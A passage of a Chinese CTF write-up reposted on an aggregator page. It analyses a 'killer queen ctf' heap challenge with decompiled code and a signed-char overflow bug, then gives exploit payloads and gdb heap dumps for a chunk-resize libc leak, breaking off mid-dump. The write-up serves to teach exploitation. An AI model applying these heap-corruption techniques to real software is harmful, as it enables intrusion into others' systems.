killer queen ctf
Posted N4tural
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了killer queen ctf相关的知识,希望对你有一定的参考价值。
SEARCHING
先看一下ida的main函数
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // [rsp+Ch] [rbp-4h]
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
puts("All my homies hate fufu's.");
puts("You can use my program, but don't be fufu.\\n");
while ( 1 )
{
v3 = menu();
if ( v3 == 4 )
break;
if ( v3 <= 4 )
{
switch ( v3 )
{
case 3:
reset();
break;
case 1:
create();
break;
case 2:
display();
break;
}
}
}
puts("Bye.");
_exit(0);
}
看一下create函数,create函数先读入了index,判断是不是0,只有index = 0才会进行工作,会free之前的chunk0,然后输入size分配一个新的chunk,然后用inbuf函数分配新的函数
int create()
{
int v1; // [rsp+8h] [rbp-8h]
int v2; // [rsp+Ch] [rbp-4h]
puts("You now get to create a chunk.\\n");
puts("Which index would you like to create a chunk on?");
v2 = inidx();
if ( v2 < 0 || v2 > 0 )
return puts("Invalid index.\\n");
free(*((void **)&chnk + v2));
puts("What size chunk do you want?");
v1 = inidx();
if ( v1 <= 199 && v1 > 1000 )
return puts("Invalid size.\\n");
*((_QWORD *)&chnk + v2) = malloc(v1);
puts("Input content.");
inbuf(*((_QWORD *)&chnk + v2), (unsigned int)v1);
return puts("Chunk created.\\n");
}
用inbuf读入输入的cotent,inbuf函数会逐步读入我们输入的字符。最后会以’\\n’来结束,并且用一个null来终止我们的输入
这里就有个漏洞了,输入是byte类型,也就是-128到127
int __fastcall inbuf(__int64 a1, int a2)
{
char i; // [rsp+1Fh] [rbp-1h]
for ( i = 0; a2 > i; ++i )
{
*(_BYTE *)(i + a1) = getc(stdin);
if ( *(_BYTE *)(i + a1) == 10 )
break;
}
*(_BYTE *)(i + a1) = 0;
return puts(&s);
}
这是display函数,然后输出
int display()
{
int v1; // [rsp+Ch] [rbp-4h]
puts("You now get to display a chunk.\\n");
puts("Which index would you like to dispaly?");
v1 = inidx();
if ( v1 < 0 || v1 > 0 )
return puts("Invalid index.\\n");
puts("Your chunk shows:");
puts(*((const char **)&chnk + v1));
return puts("\\nChunk displayed.\\n");
}
reset清空我们操作的chunk,这样可以防止free
int reset()
{
int v1; // [rsp+Ch] [rbp-4h]
puts("You now get to reset a chunk.\\n");
puts("Which index would you like to reset?");
v1 = inidx();
if ( v1 < 0 || v1 > 0 )
return puts("Invalid index.\\n");
chnk[v1] = 0LL;
return puts("Chunk reset.\\n");
}
思路就是:
创造一个size为0x420的chunk
free它
创造overlap去泄露libc
创造三个chunk,两个free一个已分配
EXPLOITION
exp:
泄露libc
首先申请三个chunk,然后不管,反正已经分配了
create(0,0x10,b'aAA') <--- chunk D
create(0,0x40, b'VVV') <--- chunk E
create(0,0x90,"FFFFFF") <--- chunk F
通常如果要得到libc的地址会用unsorted bin。去malloc足够大的chunk,在free它的时候最终会进入unsorted bin。libc的地址会被放进fw和bk中,问题是我们现在free大的chunk时它周围没有其他chunk,并且top chunk会合并它
所以我们的想法是去申请足够的chunk让它们加起来的size比0x408多,然后用下溢改变第一个chunk的size为0x421并且free掉它。这样我们就会由至少一个chunk在我们修改size的fake chunk和 top chunk中,这样就不会合并
create(0,0x60,0x20*b'A') <----- chunk A. We will resize this one to 0x421
create(0,0x200,0x20*b'B') <---- chunk B. This one we will use to perform the underflow
create(0,0x70,0x70*b'C')
reset(0)
create(0,0x70,0x70*b'C')
reset(0)
create(0,0x70,0x70*b'G')
reset(0)
payload= b'R'*16
payload += p64(0x420)
payload += p64(0x61)
payload += p64(0)
payload += p64(0)
create(0,0x70,payload) <------- chunk C. Inside this one we create a fake chunk to pass the chek for freeing into unsorted bin
reset(0)
payload = b'B' * 0x7e <------ payload to overflow char
payload += b"\\x00" * 10 <-------- some padding so the next line lands on the size of chunk A
payload += p64(0x421) <----- this will overwrite the size of chunk A to 0x421 using the underflow
create(0,0x200,payload) <---- chunk B that is returned from tcache
所有在chunkC和chunkB的将会以至于当A被重新修改并且free的时候A + 0x420这个地址会指向我们控制的fake chunk
0x56257ccda3a0: 0x0000000000000000 0x0000000000000071 <--- chunk A
0x56257ccda3b0: 0x0000000000000000 0x000056257ccda010
0x56257ccda3c0: 0x4141414141414141 0x4141414141414141
0x56257ccda3d0: 0x0000000000000000 0x0000000000000000
0x56257ccda3e0: 0x0000000000000000 0x0000000000000000
0x56257ccda3f0: 0x0000000000000000 0x0000000000000000
0x56257ccda400: 0x0000000000000000 0x0000000000000000
0x56257ccda410: 0x0000000000000000 0x0000000000000211 <--- chunk B
0x56257ccda420: 0x4242424242424242 0x4242424242424242
0x56257ccda430: 0x4242424242424242 0x4242424242424242
0x56257ccda440: 0x0000000000000000 0x0000000000000000
0x56257ccda450: 0x0000000000000000 0x0000000000000000
0x56257ccda460: 0x0000000000000000 0x0000000000000000
0x56257ccda470: 0x0000000000000000 0x0000000000000000
0x56257ccda480: 0x0000000000000000 0x0000000000000000
0x56257ccda490: 0x0000000000000000 0x0000000000000000
0x56257ccda4a0: 0x0000000000000000 0x0000000000000000
0x56257ccda620: 0x0000000000000000 0x0000000000000081
0x56257ccda630: 0x4343434343434343 0x4343434343434343
0x56257ccda640: 0x4343434343434343 0x4343434343434343
0x56257ccda650: 0x4343434343434343 0x4343434343434343
0x56257ccda660: 0x4343434343434343 0x4343434343434343
0x56257ccda670: 0x4343434343434343 0x4343434343434343
0x56257ccda680: 0x4343434343434343 0x4343434343434343
0x56257ccda690: 0x4343434343434343 0x4343434343434343
0x56257ccda6a0: 0x0000000000000000 0x0000000000000081
0x56257ccda6b0: 0x4343434343434343 0x4343434343434343
0x56257ccda6c0: 0x4343434343434343 0x4343434343434343
0x56257ccda6d0: 0x4343434343434343 0x4343434343434343
0x56257ccda6e0: 0x4343434343434343 0x4343434343434343
0x56257ccda6f0: 0x4343434343434343 0x4343434343434343
0x56257ccda700: 0x4343434343434343 0x4343434343434343
0x56257ccda710: 0x4343434343434343 0x4343434343434343
0x56257ccda720: 0x0000000000000000 0x0000000000000081
0x56257ccda730: 0x4747474747474747 0x4747474747474747
0x56257ccda740: 0x4747474747474747 0x4747474747474747
0x56257ccda750: 0x4747474747474747 0x4747474747474747
0x56257ccda760: 0x4747474747474747 0x4747474747474747
0x56257ccda770: 0x4747474747474747 0x4747474747474747
0x56257ccda780: 0x4747474747474747 0x4747474747474747
0x56257ccda790: 0x4747474747474747 0x4747474747474747
0x56257ccda7a0: 0x0000000000000000 0x0000000000000081
0x56257ccda7b0: 0x5252525252525252 0x5252525252525252
0x56257ccda7c0: 0x0000000000000420 0x0000000000000061 <--- fake chunk to pass the check
0x56257ccda7d0: 0x0000000000000000 0x0000000000000000
0x56257ccda7e0: 0x0000000000000000 0x0000000000000000
0x56257ccda7f0: 0x0000000000000000 0x0000000000000000
0x56257ccda800: 0x0000000000000000 0x0000000000000000
0x56257ccda810: 0x0000000000000000 0x0000000000000000
0x56257ccda820: 0x0000000000000000 0x00000000000207e1 <--- top chunk
修改后
0x56257ccda3a0: 0x0000000000000000 0x0000000000000421 <--- chunk A that we resized using the underflow
0x56257ccda3b0: 0x0000000000000000 0x000056257ccda010
0x56257ccda3c0: 0x4141414141414141 0x4141414141414141
0x56257ccda3d0: 0x0000000000000000 0x0000000000000000
0x56257ccda3e0: 0x0000000000000000 0x0000000000000000
0x56257ccda3f0: 0x0000000000000000 0x0000000000000000
0x56257ccda400: 0x0000000000000000 0x0000000000000000
0x56257ccda410: 0x0000000000000000 0x0000000000000211
0x56257ccda420: 0x4242424242424242 0x4242424242424242
0x56257ccda430: 0x4242424242424242 0x4242424242424242
0x56257ccda440: 0x4242424242424242 0x4242424242424242
0x56257ccda450: 0x4242424242424242 0x4242424242424242
0x56257ccda460: 0x4242424242424242 0x4242424242424242
0x56257ccda470: 0x4242424242424242 0x4242424242424242
0x56257ccda480: 0x4242424242424242 0x4242424242424242
0x56257ccda490: 0x4242424242424242 0x0000424242424242
0x56257ccda4a0: 0x0000000000000000 0x0000000000000000
0x56257ccda4b0: 0x0000000000000000 0x0000000000000000
0x56257ccda4c0: 0x0000000000000000 0x0000000000000000
0x56257ccda4d0: 0x0000000000000000 0x0000000000000000
0x56257ccda4e0: 0x0000000000000000 0x0000000000000000
0x56257ccda4f0: 0x0000000000000000 0x0000000000000000
0x56257ccda500: 0x0000000000000000 0x0000000000000000
0x56257ccda510: 0x0000000000000000 0x0000000000000000
0x56257ccda520: 0x0000000000000000 0x0000000000000000
0x56257ccda530: 0x0000000000000000 0x0000000000000000
0x56257ccda540: 0x0000000000000000 0x0000000000000000
0x56257ccda550: 0x0000000000000000 0x0000000000000000
0x56257ccda560: 0x0000000000000000 0x0000000000000000
0x56257ccda570: 0x0000000000000000 0x0000000000000000
0x56257ccda580: 0x0000000000000000 0x0000000000000000
0x56257ccda590: 0x0000000000000000 0x0000000000000000
0x56257ccda5a0: 0x0000000000000000 0x0000000000000000
0x56257ccda5b0: 0x0000000000000000 0x0000000000000000
0x56257ccda5c0: 0x0000000000000000 0x0000000000000000
0x56257ccda5d0: 0x0000000000000000 0x0000000000000000
0x56257ccda5e0: 0x0000000000000000 0x0000000000000000
0x56257ccda5f0: 0x0000000000000000 0x0000000000000000
0x56257ccda600: 0x0000000000000000 0x0000000000000000
0x56257ccda610: 0x0000000000000000 0x0000000000000000
0x56257ccda620: 0x0000000000000000 0x0000000000000081
0x56257ccda630: 0x4343434343434343 0x4343434343434343
0x56257ccda640: 0x4343434343434343 0x4343434343434343
0x56257ccda650: 0x4343434343434343 0x4343434343434343
0x56257ccda660: 0x4343434343434343 0x4343434343434343
0x56257ccda670: 0x4343434343434343 0x4343434343434343
0x56257ccda680: 0x4343434343434343 0x4343434343434343
0x56257ccda690: 0x4343434343434343 0x4343434343434343
0x56257ccda6a0: 0x0000000000000000 0x0000000000000081
0x56257ccda6b0: 0x4343434343434343 0x4343434343434343
0x56257ccda6c0: 0x4343434343434343 0x4343434343434343
0x56257ccda6d0: 0x4343434343434343 0x4343434343434343
0x56257ccda6e0: 0x4343434343434343 0x4343434343434343
0x56257ccda6f0: 0x4343434343434343 0x4343434343434343
0x56257ccda700: 0x4343434343434343 0x4343434343434343
0x56257ccda710: 0x4343434343434343 0x4343434343434343
0x56257ccda720: 0x0000000000000000 0x0000000000000081
0x56257ccda730: 0x4747474747474747 0x4747474747474747
0x56257ccda740: 0x4747474747474747 0x4747474747474747
0x56257ccda750: 0x4747474747474747 0x4747474747474747
0x56257ccda760: 0x4747474747474747 0x4747474747474747
0x56257ccda770: 0x4747474747474747 0x4747474747474747
0x56257ccda780: 0x4747474747474747 0x4747474747474747
0x56257ccda790: 0x4747474747474747 0x4747474747474747
0x56257ccda7a0: 0x0000000000000000 0x0000000000000081
0x56257ccda7b0: 0x5252525252525252 0x5252525252525252
0x56257ccda7c0: 0x0000000000000420 0x0000000000000061
0x56257ccda7d0: 0x0000000000000000 0x0000000000000000
0x56257ccda7e0: 0x0000000000000000 0x0000000000000000
0x56257ccda7f0: 0x0000000000000000 0x0000000000000000
0x56257ccda800: 0x0000000000000000 0x0000000000000000
0x56257ccda810: 0x0000000000000000 0x0000000000000000
0x56257ccda820: 0x0000000000000000 0x00000000000207e1
现在可以有0x421大小的chunk,我们可以free它,这样free了chunkA相当于free chunkB,所以在我们free之前,我们要malloc一下
create(0,0x60,0x8*b'F')
create(0,0xe0,b'WWWWWWWW')
这样就会把0x60的chunkA还回来,即使它现在是0x421,因为我们free的时候是0x70而且它存在tcache[0x70]中
然后申请0xe0
这样,内存分布为
0x56257ccda3a0: 0x0000000000000000 0x00000000000000f1 <--- the new chunk size 0xe0 we just allocated
0x56257ccda3b0: 0x5757575757575757 0x00007f6a2f4adf00
0x56257ccda3c0: 0x000056257ccda3a0 0x000056257ccda3a0
0x56257ccda3d0: 0x0000000000000000 0x0000000000000000
0x56257ccda3e0: 0x0000000000000000 0x0000000000000000
0x56257ccda3f0: 0x0000000000000000 0x0000000000000000
0x56257ccda400: 0x0000000000000000 0x0000000000000000
0x56257ccda410: 0x0000000000000000 0x0000000000000211 <--- chunk B - still freed
0x56257ccda420: 0x0000000000000000 0x000056257ccda010
0x56257ccda430: 0x4242424242424242 0x4242424242424242
0x56257ccda440: 0x4242424242424242 0x4242424242424242
0x56257ccda450: 0x4242424242424242 0x4242424242424242
0x56257ccda460: 0x4242424242424242 0x4242424242424242
0x56257ccda470: 0x4242424242424242 0x4242424242424242
0x56257ccda480: 0x4242424242424242 0x4242424242424242
0x56257ccda490: 0x4242424242424242 0x0000000000000331 <--- chunk A that shrunk
0x56257ccda4a0: 0x00007f6a2f4adbe0 0x00007f6a2f4adbe0 <--- libc address we are trying to leak
0x56257ccda4b0: 0x0000000000000000 0x0000000000000000
0x56257ccda4c0: 0x0000000000000000 0x0000000000000000
0x56257ccda4d0: 0x0000000000000000 0x0000000000000000
0x56257ccda4e0: 0x0000000000000000 0x0000000000000000
0x56257ccda4f0: 0x0000000000000000 0x0000000000000000
0x56257ccda500: 0x0000000000000000 0x0000000000000000
0x56257ccda510: 0x0000000000000000 0x0000000000000000
0x56257ccda520: 0x0000000000000000 0x0000000000000000
0x56257ccda530: 0x0000000000000000 0x0000000000000000
0x56257ccda540: 0x0000000000000000 0x0000000000000000
0x56257ccda550: 0x0000000000000000 0x0000000000000000
0x56257ccda560: 0x0000000000000000 0x0000000000000000
0x56257ccda570: 0x0000000000000000 0x0000000000000000
0x56257ccda580: 0x0000000000000000 0x0000000000000000
0x56257ccda590: 0x0000000000000000 0x0000000000000000
0x56257ccda5a0: 0x0000000000000000 0x0000000000000000
0x56257ccda5b0: 0x0000000000000000 0x0000000000000000
0x56257ccda5c0: 0x0000000000000000 0x0000000000000000
0x56257ccda5d0: 0x0000000000000000 0x0000000000000000
0x56257ccda5e0: 0x0000000000000000 0x0000000000000000
0x56257ccda5f0: 0x0000000000000000 0x0000000000000000
0x56257ccda600: 0x0000000000000000 0x0000000000000000
0x56257ccda610: 0x0000000000000000 0x0000000000000000
0x56257ccda620: 0x0000000000000000 0x0000000000000081
0x56257ccda630: 0x4343434343434343 0x4343434343434343
0x56257ccda640: 0x4343434343434343 0x4343434343434343
0x56257ccda650: 0x4343434343434343 0x4343434343434343
0x56257ccda660: 0x4343434343434343 0x4343434343434343
0x56257ccda670: 0x4343434343434343 0x4343434343434343
0x56257ccda680: 0x4343434343434343 0x4343434343434343
0x56257ccda690: 0x4343434343434343 0x4343434343434343
0x56257ccda6a0: 0x0000000000000000 0x0000000000000081
0x56257ccda6b0: 0x4343434343434343 0x4343434343434343
0x56257ccda6c0: 0x4343434343434343 0x4343434343434343
0x56257ccda6d0: 0x4343434343434343 0x4343434343434343
0x56257ccda6e0: 0x4343434343434343 0x4343434343434343
0x56257ccda6f0: 0x4343434343434343 0x4343434343434343
0x56257ccda700: 0x4343434343434343 0x4343434343434343
0x56257ccda710: 0x4343434343434343 0x4343434343434343
0x56257ccda720<以上是关于killer queen ctf的主要内容,如果未能解决你的问题,请参考以下文章